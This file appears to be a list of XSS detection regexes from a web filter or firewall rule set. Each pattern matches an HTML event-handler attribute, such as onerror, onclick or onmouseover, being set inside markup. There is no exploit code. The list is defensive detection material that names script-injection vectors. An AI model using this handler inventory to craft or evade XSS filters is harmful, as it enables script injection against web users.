-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAudioAvailable[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozBeforeResize[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICanceled[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICompleted[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUIStarted[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureStart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureUpdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGesture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMouseHittest[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMousePixelScroll[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozPressTapGesture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureStart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureUpdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGesture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozScrolledAreaChanged[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureEnd[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureStart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureUpdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGesture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozTapGesture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onRequest[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGAbort[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGError[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGLoad[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGResize[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGScroll[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGUnload[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGZoom[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onabort[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onactivate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onadapteradded[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaddtrack[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterprint[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterscriptexecute[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterupdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onalerting[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationiteration[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationstart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onantennastatechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioprocess[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudiostart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeactivate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforedeactivate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecopy[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecut[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeeditfocus[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforepaste[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeprint[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforescriptexecute[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeunload[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeupdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeginEvent[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbegin[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblocked[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblur[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbounce[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onboundary[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbroadcast[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbusy[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncached[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncallschanged[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplay[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplaythrough[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncardstatechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncellchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncfstatechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingtimechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchecking[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclick[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclose[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommand[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommandupdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncomplete[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionstart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionupdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnected[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnecting[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontextmenu[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontrolselect[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncopy[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncuechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncut[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataavailable[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatachange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataerror[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetchanged[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetcomplete[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondblclick[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeactivate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliveryerror[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliverysuccess[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicefound[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicelight[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicemotion[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceorientation[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceproximity[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondialing[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisabled[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondischargingtimechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnected[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnecting[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondownloading[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragdrop[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragenter[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragexit[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondraggesture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragleave[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragover[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragstart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondrop[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondurationchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onemptied[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenabled[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onendEvent[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onended[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenter[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerror[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerrorupdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onexit[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfailed[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfilterchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfinish[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocus[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusin[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusout[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onformchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onforminput[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadaxismove[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttondown[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttonup[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadconnected[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepaddisconnected[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onget[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhashchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheadphoneschange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheld[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhelp[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onholding[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onicccardlockerror[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oniccinfochange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onincoming[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninput[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninvalid[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeydown[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeypress[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeyup[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlevelchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadeddata[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadedmetadata[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadstart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlosecapture[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)only[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmark[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmessage[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousedown[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseenter[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseleave[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousemove[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseout[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseover[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseup[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousewheel[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmove[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoveend[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmovestart[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenerror[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkdownload[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkupload[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozorientationchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockchange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockerror[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoztimechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnomatch[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnoupdate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onobsolete[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoffline[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ononline[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onopen[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflow[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflowchanged[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpagehide[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpageshow[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaint[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaste[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpause[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplay[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplaying[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopstate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphidden[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphiding[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshowing[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshown[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onprogress[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpropertychange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onratechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreadystatechange[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreceived[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onremovetrack[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeatEvent[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeat[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreset[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresize[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresult[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresume[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresuming[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onretrieving[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowenter[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowexit[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsdelete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsinserted[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onscroll[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseekcomplete[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeked[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeking[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselect[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselectstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsending[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsent[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onset[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onshow[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstalled[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatuschanged[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstkcommand[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstksessionend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstop[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsubmit[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuccess[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuspend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontext[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeout[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeupdate[\s\x08]*?= 
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchcancel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchenter[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchleave[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchmove[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitioncancel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionend[\s\x08]*?= 